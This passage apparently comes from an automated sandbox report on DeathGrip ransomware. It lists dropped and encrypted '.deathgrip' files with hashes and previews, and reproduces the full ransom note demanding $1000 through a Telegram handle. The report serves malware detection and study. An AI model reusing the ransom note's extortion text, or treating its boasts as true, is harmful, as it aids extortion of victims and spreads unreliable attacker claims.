                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\PWCCAWLGRE.pdf.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.776805131058611
                                                          Encrypted:false
                                                          SSDEEP:24:Zo6wvSG3LO6+wSJaZhLqNR9ym9cON+X0m/q/w8qfbHdLkKf:Dab6taYr7cOgCufbHv
                                                          MD5:F37EB0F65195A2DD648CB7CBD6D708E1
                                                          SHA1:256166A88646911FA5E6EAE96CBCB0DDD0507A2F
                                                          SHA-256:602334B1BEAE1CC4E3D795A24E450BFC0C1F3E74F12D28E7A923170012CDA820
                                                          SHA-512:ED9C8DA87545D12D1E52496E36F9FE82E0483383BE56CFCAD085C020EF7FC0A66D0EDF18200E320F13C5EB17A15C134C02A0903AF452F7DECFDF4AD629482744
                                                          Malicious:false
                                                          Preview:........[9C.-.......IJ.kMA.D..P.....3.........F.//.i...!....G.d..~-....*1u=....... >u~F....m7...X..N.Zw.M`.`.~.;1.{2....F.I.f.".5%.!,...m..z.a.T......B.^a...6.>.z..l...b..C.:.A.RrI....4W...X..b. .....$....i....q.Bh..@...!..v......P..T...k>.A...]O.<&..S3.Z.1.._.;...{fx..F;...j.... 2...D..0....^......]...>.r.9..Vt.!!gm^:.$.9....R...:.P...3...N.6..>.|...%\D#.!..?..R...v.$aS..{)j..F.q..|.BG.....A..W...p.J,.V$._S]..........'<...D...+.....BJae6 .,?4...M.~.k..&g#..Y.z....S.<....mr..N.F_.......S..F.fF...}.R......(.y/...#.*~..v..7'my2.6F.O<gCy..f.....K.d...=4xv..\I$...J+......+.@.....3,^.@...O.;......h.1.X#6.....(KK{-I.j.].l..<_f.CA.\z.p....h...j...P.#.H....C..t..FDOh.....ZR6.L.[...o..B=.......\....?..Jp..#v..&.&_.......'.....E..... .{....zr.2m.m.bv.l.$...,#h...;..;.a.q,.I.....O...Cl...E.\Y.!ZBE...,Y...a1.o..8...N..G.~.R7#.....2{.g#9G.5...%)....L.r...d.Y..m..(. .>..P.m..<N2s....;..j.|.e.e..NA..>..".T..4..C.......`@...1..Z.=*..EO>.

                                                          C:\Users\user\Downloads\PWCCAWLGRE.xlsx

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\PWCCAWLGRE.xlsx.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.746460310958782
                                                          Encrypted:false
                                                          SSDEEP:24:WaLIpBf2pJkmB86KjiP7qdsRMcWEbABCADwRwBdy7UV+R7U2sakM1ZCSnGRen:WaLIpMDku3KGTqORfA+wBcUFdoJGRen
                                                          MD5:51F89A6FFFF79F35A11D33AE8A2DEC63
                                                          SHA1:87B55EEB947B464C6978AC6C8D36895CFB5971B5
                                                          SHA-256:BA0D4C7D971D6FE1DB6551AAD9FBA83245829329EBADABB5A94CD3B92B27D76E
                                                          SHA-512:ADC2E1BECFB0F0D41689C03EA4BCC0C0E9B8EF3E053547FF1886FE7E48728F0676D5F289F993246067E9DAAB558F34807E2E5F8459F283B5EB73336F4F258CB6
                                                          Malicious:false
                                                          Preview:............8.]..A....:f..\J..a..b5...3.L..u....bru.iXm4...X..*J.>.......km.E..v.;.3.?...dK5.5+.I.LA..'...>s{9.......T.0..5..u..E....+.0..xr9.e..."...3."....!\.X.C..."R/.}zIr....<..`..1X.%T....7f.z.K'...E......'.....%.....,.uS.3yn...0V...%...7F...x:6..&..sR(6.;..'.6......cv....T.*].|.nx.. .z..0...J..T.....................S.u..r.,..VD......(c. ...s4X....Y3w...\....Lk.t.S.JD....X.<f..73q..o%.(Lw.~`Uj....z...9...A.............j5....l8[.n........9~..%....R......}.8..kV.........W..R......t6bf.E...S@A*...h.}.>@F.iI....)..0...{....R...;.......E0>y.....y,..,j.O=.u_8:e.3@&}h9...KgUp.q....*.,....*..Q+..A}..'+.....St .`...F...*GG...D..v/s.......,P.g.C4.z).K...:. 1...l.W...@[].....t...cm~.6+J......hO.G.....]..h.......h.....M:...$BSd.,.SR.s.g.$rCdd.L..u....A..V|.E.}....J..@...}..Vi.~.b...3.9q...mU..r....v)ox9....o$c.yC...+.C....-..j.M.&*L......mK....9]j.@..K...C..@51...4..gq....L...b._GZ.j..s......L(...k.sb.6..$....../..i......TC....-..

                                                          C:\Users\user\Downloads\QCFWYSKMHA.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\QCFWYSKMHA.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7457562820513575
                                                          Encrypted:false
                                                          SSDEEP:24:+AfbQXYx4BE4oUlRQnX+dcVkekWKCnyzq8TYcyzxBR8hyBPwZbeNsv4eslG:f2Zy4omRQX+dtWnn6q8FyzlBP42o8lG
                                                          MD5:90CCCB91B8C1C0BCFD5C6BE472B7A7E8
                                                          SHA1:E86E85F57FEFD836A8C69B14FC6EB2045AE61180
                                                          SHA-256:56B631F5350398A49851075DA400C308C9E6EB5A62FFC574E56757BA7E1CAA08
                                                          SHA-512:03865BCFE7C9B64876EFD6FA2254645BE4087F8240789F48C77266FC43CA5055853E33AD8C10C818928A5D920350E2F4A8B7C891CF8514F6F1A098FB607DE37B
                                                          Malicious:false
                                                          Preview:........H..c1....../<....V^.U.Fq.M/.............m..[[..p...$N.T....O.....0{.....Km..[.j.......o\..k<u$.....x......c..K]........r.y...]V.2).UM..W.H$H.i..BQm..^..N.>.=..Q\..d.P.liU.=...&&..B..-)..j&... .n.%O..............S....>.zL...B..o.-..;o...}j4..g..o.:A.?...e.#u2*.....2d..Z.GD^ZU.P.......... uno.].2...j.A7.w..I.....r..NT....c....E....`./..Z.e.....iz"..$...;B..qKO..%K<.'.......&..L..$..)@o..K..6...1.d. ....d?r$...a...o7.D*....M..2Uf...u..>.....T...@.._.I.....O.C..C..m.3V..8u=GM9...j_.L.%.X.7..4..z...m..`w#jP]~.q.F...KGmd.....v..tm.V.7..Y.0<.l..-..&..).).x-^?.L.I.v6.).p...2....!.9.../...L.....9.XG.6...=N3.... ..+..W.....4.a<..x@h.....e0WF XUaW.H.....~...1f.....|..r..._....8._#!#.....<.+.a.+a...KAc3P......>..k.i..fe.&)f+..h...#....1!.T..~;..]^.....L.n....L1m~>`..L....{...+.V.o.....i7J...7..i..l.!K............`s.4S..Z..#.7.P..[.h..>.7......[..............&..W_`.3...P..A....4....$h2......t..}.}x...!..o...?3...G..%5d.......~~..*.T.!...0.

                                                          C:\Users\user\Downloads\QNCYCDFIJJ.jpg

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\QNCYCDFIJJ.jpg.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.750741327469132
                                                          Encrypted:false
                                                          SSDEEP:24:b7hWRofaIow24yvr4QFdkpPkwn0gXkPrBsjD81iY5Th4SbtvUVXJmYBV6TG5UMJW:b46fav+nQGFY8SbtvUVJncR
                                                          MD5:D822807DB6FF103698050A5C91DAF0A0
                                                          SHA1:B93194689C1C0CA4E453AFCE5CF943E84E2B93E0
                                                          SHA-256:EFE7CE63AAC7D9E730F9C9FCF8C83EDC85A566927929A01927484921825F18C7
                                                          SHA-512:56C42CAF04189FE5C15C099BC3FDCAFCE1FE2D0F41FEA0E339B1D6E6DAA8E1DFBB15E34B889C9FF871771889B5129C70FDD709B33E6214B4A846B9768818DDD0
                                                          Malicious:false
                                                          Preview:..........\..])..%.x=9h...i>.....OzeM.....<1....-2H....?...........4\`U..B...}..s..:8x.)X......L.4d...i.|..y........ .-".c...........M.......a{.I.v.Q.I...A.o.A..........@).//aZ&..B,.B.. .`..4....5..E.xU.a.:.....,.dl.3.?..(...R*.l...@..X..^....K....#....0.N.$.7.?.|....:5\...}...M+".#...-.d.@...&)i......5.NC..^*...8.E.+..yd......l|@[....L.`.0.$^D..P:..fW..`...S...J,.D....9D......]....q..K.t5.B.=..O.-...'..s=.R.\.T.7@>...I.t....S...V,..c]7..-8...i...B.^....J?R.=...&..y....'......{.?...d...b*.EO..F.8b...D....4...5.....]...p.s.t..:.......R..:(.v..U4.....T..?..1$.>t.0k..1.}.....ywJ...,<..w;s,0F9.I......$....}P...|.N..T...F.".MA..5}S.B. &M.6..;oM.. "2^W0......o..B..O..o......^..6..u2@...s.}..K4^.8KU:..t....i.....%k<"m.bis=..U.&72............S..Z.7.p.......p..X.K.....^e.[y}R.b$.n.........=<..+...6;.o.+....<.....Io.OHl..x...G.1.n...%.4...Gw...o`..tO.X...C""OW.{...I.AX\...C.......p.....nu...v7e.+.mS+l:...y.Do..X.....".\E*0.0.h...=.`.]x/vu..%N,.]

                                                          C:\Users\user\Downloads\QNCYCDFIJJ.xlsx

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\QNCYCDFIJJ.xlsx.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.741230055912095
                                                          Encrypted:false
                                                          SSDEEP:24:q4mH48eWCQ84pmnWnH/hMR5pF/NsV3/fHE95c33cwcJ4gYEV49Hyo3iGWdu0/Q1Y:IpeWTb6Q/hM/X/NW/P5c/NYEV49H73iZ
                                                          MD5:BD6F4D8D36832B62B0343955FD48F97B
                                                          SHA1:1A3DDB183C815E33C1885B62827AF6C30462A3A7
                                                          SHA-256:01AAD1F231FC0F4920DAF91B5327EC4C07F918DB58891215D471FA2FF79E199E
                                                          SHA-512:E0CAE657601960E5B406D8BD7915F20CF0A4B66C1DE6F62BB81D005E6392F561D15E440DCA02108DC7B5CCEE93CF85CBF4DA1CFB47FAE673CD4DABD05504C3EF
                                                          Malicious:false
                                                          Preview:.........J+..[.m+.4n...([.Q....pBP.i...uw.5n)...$.].f..N{..[r..N!...T..t...e'..WK...m...!..r"............tR..JWt..k.-..;.....a..B....[..F..q....._$Gc...8..9.&6...-C[oo.Ej&...%I5D.{...ZS.9..R.9.Z..y.b..j`.'....8...i.4.Rf3Wr.n......t.....j.{...3......@Z.....WT6.......^....Q...wqC.....5.(.,.5..}g...U .+..n.-.-..qPUbW>h.M...":v...]-.?-^);.=.!..P..p............&x`.S.4+..6.T.X..D...$4.f..`.....E..c.S.....x...I5.]|_+vC....Z.{K.%....o"ze%&Y.!.T@#f...<.....V....=....n9..b.3.-%|.?.......P.M..4NK.3.s.?....h.'.....Nz ........tk.......-.$.......FE+../....|).N......Nn.]....-..8..m..B6..9....*...d......{P'.o...U...M`.]\Or../.j|..-.....:EY43)..)"......O*.q.k....J..O..J....H5n..3B-.:....s....=.d ;..N..s..N...+...Y.`(u.w.a;.4D.........;...P.....[..J?..s...F,q..G..,1.....a.....h.O.y.F&f./i@..Y..8..:..y.QnY.%#7f.._....[.;._(s*.HD.,.ySSH.X.G.S..&:4k>;5.v*Pg.....B....y@v..;ZM..m,CD\..'.I(.3\Keg.V^.....6..:x`.!..1.U..;....U....}..FZ...$..8..Z....BX.9.>:...U...T

                                                          C:\Users\user\Downloads\SQSJKEBWDT.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\SQSJKEBWDT.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.752276794133184
                                                          Encrypted:false
                                                          SSDEEP:24:WelQ4Kkd++IWgK6CyQ4nMSvTbcjaz5kvD4m5gyzbwd/Dq5e3XbuwChnl3SGh1K4+:nlYkdTIWoQtcTd9yDhil/DrQlCq+
                                                          MD5:5EE1ECC2ED5760D790DFB4EE6EAAD8ED
                                                          SHA1:D14DD5B56B1258DB3DF478AE810E57BBFCAC92E7
                                                          SHA-256:5F20B18506DD949691533E9D2C45C6C191814D0E86820EB4879E6EFB34D70570
                                                          SHA-512:F1CB44D7E495899B8B798EC6B1FBB0A4771A1B5E1C65AD1C218195025DF426588D91BE953B45C3A766A5E95B12BCDBFFE460A6F4AAF5C7DE8C520CAFE77134E9
                                                          Malicious:false
                                                          Preview:..........W...3.]...P[.lr:o......"..S@.^Q.&.n..VRP\.....%......O.......E`....k.u.G...f1.......u.F..p..\1.Y...o..=7.1e-'..PAX..:|.9...s(b1.[.Y.!.#H.R...*..f]......t.G......`."...?....t..&8..!.i.f..5g...q..O@.CL.......<.'.X.s0.!.6%-4.t.T....c.K.... #..l...9;....+.[.p. m...v4t..$.._....b....^....u]\..8..P.k....l6..my.i......<.S(mk'.S.".b.....RAe_...-;:.Y.|.^.O....Q.GwDi.Kz... ...V.A..S6.S.P...W@.!..*......$.K..)...L.`<x./.s.DS....j0))=....}g..M.......J.xi....t.......5;...A....../............^O..EI~..m...>1K.l....d..f7.-.%k.....1.::..lF.m..w...8IS.$w...]....^.xz.kx........."#P..!6...k@.o^.. .....O........q............ .2Z:....v.P...K: *..c....?.......Cu...K..#..|..[.!.l...........Sq.%8j[...f..+.........GY|....V'J........).`. fa.H.......=.s.q.wu....%..*D.>/....M.i...Lp.vS.:Y^.5<..O..:..H.pg%../..DF../|.G..y.d......>._T.....T.Ri..w.w...t..o@Vj. g.....2.......n.v...P...B.B.Y|.z[J9.y..l..y).....86Uw#~....C.i..0~.......b........+.M./..}k..

                                                          C:\Users\user\Downloads\ZQIXMVQGAH.docx

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\ZQIXMVQGAH.docx.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.733985600240128
                                                          Encrypted:false
                                                          SSDEEP:24:6CVTi1IjQiUTsMZTzDCBZoUtYjxh9hpjdyn7B1el3Kp/mBot1mFr29YiiY:g1Ps6+XoUqjjpsF13Zht1WudiY
                                                          MD5:3EDA8C8D7CBBAF84DE6CF05E0876705C
                                                          SHA1:591222330C6D1E860F7D8387368CC86212D9B017
                                                          SHA-256:CA1E3056D96180FAB274443C7E9534746304A1812708B01BAE0689C439C701ED
                                                          SHA-512:2448ECE0AF82F6D14DDB18DBB3A59CC0FFF919962B5DC42A0986848F1636482EC7561300B4D82E955AAA5906544DA8D238791BCDD9F55CCCCE241C65FD66F285
                                                          Malicious:false
                                                          Preview:........{.#....7..a.U.*.-.....r...:b"....U.:V.bj..3C.....3..\..F..1..S.H..|D..>..'..L%u..SJ.~.^y....6.|^...6.....>...]./...}../,.u.......`...n.9.....l?ey.Lg.@>>...X/A.=f...R^!.."]w0".... .K..}. ..c......~,.-t...K....)$.y.|.f*?.0......U...D03..2WuX).+..{h...j..yK.zZ.*........E.......U7}oe.|.04....y.z ....9......x.j.....Kf..u7.rw...%............\_.\.......3.,x\ .B.6....c.A..T...gL.'..(.&...!o._...R...4......4..#P+..^m @Bq4...D.P..I.&>Z.....]..R...!..[....2....n...R..M..u......6.......EJ.0.{E1{..;..,:.`...'..iF(..h.{.}..n.....1..,....._...j....f.\.B^.va....,.j.k.[.t..q.K*.'-B..70..8..T{.p..|....1_...b.....d. WL..|..u...hL...mJh*.2....eq..._...v.+sv^.AV._.X+..K.Af-.r....4z.x.f..R.`........^..R.I.9....F..%{E..!9X....!w..5Oa#..!A./702.R......S...o9....R.Y....ipI(g...........~|[I..m.j.)L.X..Q.J.n..+.`....j...DN..ehqq"^.. Q...8/._ ...:P.{d.....w....e.B.Hq.i.M.r..m..C...,....g....d.%..._s-@[..].........e.!dy.'}#..q.^(UCGu......9DZ.`O

                                                          C:\Users\user\Downloads\ZQIXMVQGAH.xlsx

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\Downloads\ZQIXMVQGAH.xlsx.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.7458323837797565
                                                          Encrypted:false
                                                          SSDEEP:24:JS0CrxvRob4YnidBCEX5m/+4oFcrFl6BL6GlsUv3pScJk7o1UbEuBGF6PSqbRFXi:KrNRCJidOXoF8oB7vIcJkoU4qSqNFp/c
                                                          MD5:EC09B3C8AF7E20F4D102DD4FC2E28B1B
                                                          SHA1:769BDD45DB89F15E7AD65D4DD08498AE8A4D1F5F
                                                          SHA-256:F3E87E9DF01794C1E55F3512B2994AAE48E1BE7EECA304335F04735FECDD72BE
                                                          SHA-512:92140CCD62760208D174166546BB07B97B5E26C8DBB351A62B6855D93B2448438FDFB56D23044E7FF7D75BAC4D520DBAACFDC9552DDC85BB37BD668681D55504
                                                          Malicious:false
                                                          Preview:.........2b....b=....W].MB,...5..6..z...t.S$....x.....G..WMkfi.....q.f.t.6.....x......3.M.t.....C...J......`..A......[.b..1....g.h..#..CZ..5...C..X_6.E...^q.M.W*Ai....~......w....b.a.!...!e..Q?sbx.W-..U...".1...$...AO....&.."tj.o.. r../[.tJMc..#......+.....X!.v...~.Y.........E/B... ZV..e^.$..w.f.Y.v.k/.\.....N..$.......o.@...C.C.dD._.cMN..W.e.}\..!..X..2..G...._.....9V....$9h.jo..u....h.O?l.N?...7.....S.....l..O...v..f..k>...vZ4U......5..3.R4..1i).R...!...!.r;.ZF..Q.W..X0...."O.....).n..].uy.....W.:!..O....d.p.p.q..~.P...q.~%...d=vZ.7...e.[.|...8...m....Nh.J..u.,[..c. .5.P....'Q.P`.].OW..I..A...^wF.e&.Q..M.|3[........b..E..2";.lj....w:.?...U.yV.O..*..Iq...~`9......[.J...M..;.E........I.t....,CW*.>..J.A..@.Z......~T.&.!a.@.d.c~.;nJ;.......r..dW..S.NB"5i.Rw..~..Ba..p8-T$....'kM........O....L...hFN...1`[....s.../.+Z...S.t.l.../.;...@..8......v.Q.]/,...Q.OA........)A.I.>.%zGa..g.O..9...<):.2E]...4..'...'...&z....B1.$.2nH..Q....H..0....Y .n

                                                          C:\Users\user\Favorites\Links\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\Favorites\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\Links\Desktop.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):848
                                                          Entropy (8bit):7.472605236431139
                                                          Encrypted:false
                                                          SSDEEP:24:EHph3lKP9Fur1YDPc8UqHgXLHxil4+vNa:spBlKP9o5YD/HYLHxillvNa
                                                          MD5:E73CFF335B48E105EDB5EBCDBD4A793E
                                                          SHA1:209A5A0B1211A01BF155AC949333DA0A8D04A743
                                                          SHA-256:0F5CBF28E7CBC92BFF8F3A254CC488C87806150379E253DC4E5A3747951BB011
                                                          SHA-512:DF29044F5B08794F2147F4BA957A11E9CEA9AC22860F4B185BFE8ADBCD7A4DF74B0A62772AF4D5FC731BD2E97A252880E44B0A0C7805EE93CD27E34322442029
                                                          Malicious:false
                                                          Preview:.........xM...E<.....7.&C.[[.xm..BS...h.o...5..'*...(.9QY...v...2I~.f....>..[:....B..-e..C7%.o.sw.....bP..".....i".=.\...*..p.N.IE.N3...q.^gZ '..1.P...*...i,.j..\.n.....x6.@W.H..J.Y..i.@....F....w.$.&..f]I....y......Nc..z.L.N.=....G.z#f,O.....wm.)../...o.....(>..+..<....QK.`.........Mc.6.^3.....;....v.kYu.eV..CJ.V.=...F..0.5.c.@U...|...._;........PS.A.v8._...y.b......iR...\.G..W!L..~.}v.I...N.!i...C....D..s..:.i. N.....(KS.#P........|.R .w...|.;*..x.'....]c...!..y.....pJX3Ygom4ieH5E6TNeXd7Big6GedhO2PkQjHYUDkbP9Ow/jAH3ZdCKqQWnP7NIVElPQRWi0TRfy3nHrQEXpaWJC8UZKMbJtW/fLxZ5g/8o0ZuGABIKUrLDLeMp4zBLnBb2YEfos12hyHvSYIquZRXA/mGOhjlAsc6p70Xbpc9io6jecICWtDihp9YHI75Sokz+0ppT1AH7+6odtie2H/pojogMzVC4Ub9i6Ncy2G+nztxkU3hz7+zGRP8EZBXPaKjk5SzoYW/2xhiEKr5Uuae6z0lSr30qNnl7w+WSAbkaOxmPGe7K7wOXW6dtym+z0Ci1ebjqKJMOSZfognRjgso5A==

                                                          C:\Users\user\Links\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

